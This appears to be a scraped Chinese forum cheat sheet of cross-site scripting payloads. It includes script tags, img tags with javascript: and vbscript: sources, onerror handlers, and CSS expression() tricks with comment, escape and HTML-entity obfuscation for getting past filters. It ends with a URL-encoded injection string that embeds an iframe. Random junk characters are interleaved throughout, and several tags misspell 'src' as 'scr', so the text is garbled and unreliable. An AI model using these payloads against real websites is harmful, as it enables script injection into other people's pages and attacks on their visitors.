<script>alert("跨站")</script> (最常用)
6 B% s3 m! X9 [4 u& Q" N<img scr=javascript:alert("跨站")></img>/ H+ B" d' f1 T8 G# Z
<img scr="javascript: alert(/跨站/)></img>
! Z/ K6 C$ i) T; W<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)) E7 \2 n5 Y9 U
<img scr="#" onerror=alert(/跨站/)></img>! V+ J$ u- R. {; Q7 O! m3 l
<img scr="#" style="xss:expression(alert(/xss/));"></img>
$ I& Y* y! j* b- @( `/ t<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)2 `4 Q# Z s- u6 N
<img src=vbscript:msgbox ("xss")></img>* m# O4 @5 ~6 I8 P# J; D1 F( F
<style> input {left:expression (alert('xss'))}</style>
8 Z9 h, V9 C4 D" B0 C v<div style={left:expression (alert('xss'))}></div>
9 p \* J9 ]' L h<div style={left:exp/* */ression (alert('xss'))}></div>
) o2 Q* A# H" b- M6 E<div style={left:\0065\0078ression (alert('xss'))}></div>9 X9 L* k5 S. Q# ^4 J& q
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>* i/ L3 u+ f0 }8 _! T* |" l$ H3 b
unicode <div style="{left:expRessioN (alert('xss'))}">
1 w# w9 `2 p" R; ^# H6 X0 p. k1 ]
8 B* @0 q& |0 E1 m: L"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["! }- ]: ~, x4 g( A% S$ M7 p1 Q% c
|